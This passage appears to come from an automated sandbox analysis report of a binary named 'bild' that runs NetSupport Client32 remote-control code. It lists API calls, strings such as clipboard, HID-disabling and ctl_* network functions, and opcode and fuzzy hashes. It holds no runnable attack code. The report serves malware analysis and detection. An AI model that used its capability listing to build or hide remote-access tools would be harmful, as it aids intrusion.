                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                          • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                          • API String ID: 383231468-3762817415
                                                                                          • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                          • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                          • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                          • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                          • API String ID: 0-293745777
                                                                                          • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                          • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                          • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                          • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                          • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                            • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                            • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                            • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                            • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                            • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                            • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                            • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                            • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                            • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                            • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                          • String ID: NSMClassList$NSMFindClassEvent
                                                                                          • API String ID: 1622498684-2883797795
                                                                                          • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                          • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                          • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                          • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                          APIs
                                                                                            • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                            • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                          • _memset.LIBCMT ref: 1115B266
                                                                                          • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                          • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                          • GetDesktopWindow.USER32 ref: 1115B309
                                                                                          • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2935161463-0
                                                                                          • Opcode ID: aa24af5320f1a66e50dc0ce942e36c3092fc734b39a40bfe4571f2283a562896
                                                                                          • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                          • Opcode Fuzzy Hash: aa24af5320f1a66e50dc0ce942e36c3092fc734b39a40bfe4571f2283a562896
                                                                                          • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                            • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                            • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                            • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                            • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                            • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                          • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                          • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                          • API String ID: 1096595926-1306570422
                                                                                          • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                          • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                          • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                          • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                          APIs
                                                                                            • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                          • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                            • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                            • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                          • wsprintfA.USER32 ref: 1100548D
                                                                                          • DeleteObject.GDI32(?), ref: 110054E2
                                                                                          • DeleteObject.GDI32(?), ref: 110054EB
                                                                                          • SelectObject.GDI32(?,?), ref: 11005502
                                                                                          • DeleteObject.GDI32(?), ref: 11005508
                                                                                          • DeleteDC.GDI32(?), ref: 1100550E
                                                                                          • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                          • DeleteObject.GDI32(?), ref: 11005528
                                                                                          • DeleteDC.GDI32(?), ref: 1100552E
                                                                                          • DeleteObject.GDI32(?), ref: 1100553F
                                                                                          • DeleteObject.GDI32(?), ref: 1100556A
                                                                                          • DeleteObject.GDI32(?), ref: 11005588
                                                                                          • DeleteObject.GDI32(?), ref: 11005591
                                                                                          • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                          • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
                                                                                          • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                          • API String ID: 2789700732-770455996
                                                                                          • Opcode ID: 545b59c5a20981a964d2566c076ce67725319314088b52aa60ee8a5e99a3c4b0
                                                                                          • Instruction ID: d9229358f4933b228272336fa2bf33a0883a331572b372d30b0232039735f129
                                                                                          • Opcode Fuzzy Hash: 545b59c5a20981a964d2566c076ce67725319314088b52aa60ee8a5e99a3c4b0
                                                                                          • Instruction Fuzzy Hash: 5C816975A00609AFD728DBB5C990EABF7F9BF8C304F00451DE6A697680DA75F801CB60
                                                                                          APIs
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                            • Part of subcall function 110ED1F0: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105E76C,?,00000000,?,00000000,75A78400,?,?,1105E76C,80000001), ref: 110ED21B
                                                                                          • GetTickCount.KERNEL32 ref: 110FF4DB
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110FF4E8
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 110FF4F5
                                                                                          • GetTickCount.KERNEL32 ref: 110FF4FB
                                                                                          • wsprintfA.USER32 ref: 110FF5BE
                                                                                          • _memset.LIBCMT ref: 110FF5CF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
                                                                                          • String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
                                                                                          • API String ID: 137837830-2801557662
                                                                                          • Opcode ID: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                          • Instruction ID: a11abc6b97969388e485db2e6a8e88b8a5e3b39e7edf5af597a12920a36432c8
                                                                                          • Opcode Fuzzy Hash: 6bf3ca8b1897a9fb597f7e1bcf8d3474db02404c230f644f8e4e51502cd176c1
                                                                                          • Instruction Fuzzy Hash: 9471EC75E4421ABBEB10DBA1DC89FEEF774EB08708F10419DED14A6181EB306944CBA6
                                                                                          APIs
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • wsprintfA.USER32 ref: 110EB1B8
                                                                                          • GetTickCount.KERNEL32 ref: 110EB212
                                                                                          • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                          • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                          • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                          • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                          • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                          • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                          • API String ID: 3451743168-2289091950
                                                                                          • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                          • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                          • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                          • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                          APIs
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • _malloc.LIBCMT ref: 1100B366
                                                                                            • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                            • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
